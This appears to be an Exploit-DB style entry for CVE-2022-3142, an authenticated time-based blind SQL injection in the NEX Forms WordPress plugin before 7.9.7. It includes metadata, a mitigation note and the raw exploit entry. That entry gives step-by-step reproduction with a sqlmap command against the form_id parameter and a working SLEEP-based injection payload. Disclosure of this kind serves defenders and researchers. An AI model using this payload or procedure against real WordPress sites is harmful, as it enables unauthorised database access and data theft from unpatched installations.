NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi

vendor:

NEX Forms

by:

Elias Hohl

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: NEX Forms

Affected Version From: < 7.9.7

Affected Version To: < 7.9.7

Patch Exists: Yes

Related CWE: CVE-2022-3142

CPE: 2.3:a:basixonline.net:nex_forms:7.9.7

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 20.04

2022

NEX-Forms WordPress plugin < 7.9.7 – Authenticated SQLi

Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin. An attacker can exploit this vulnerability by sending a malicious payload to the "form_id" parameter via a GET request. The payload is a time-based blind payload which will cause a delay in the response. This can be used to extract data from the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the plugin.

Source

Exploit-DB raw data:

# Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
# Exploit Author: Elias Hohl
# Date: 2022-08-01
# Vendor Homepage: https://basixonline.net
# Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
# Tested on: Ubuntu 20.04
# CVE : CVE-2022-3142

Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin

https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5

1. Start a new Wordpress instance using docker-compose.

2. Install the NEX Forms plugin.

3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.

4. Execute the following command: sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3
sqlmap will find a time-based blind payload:


Parameter: form_id (GET)
    Type: time-based blind
    Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
    Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)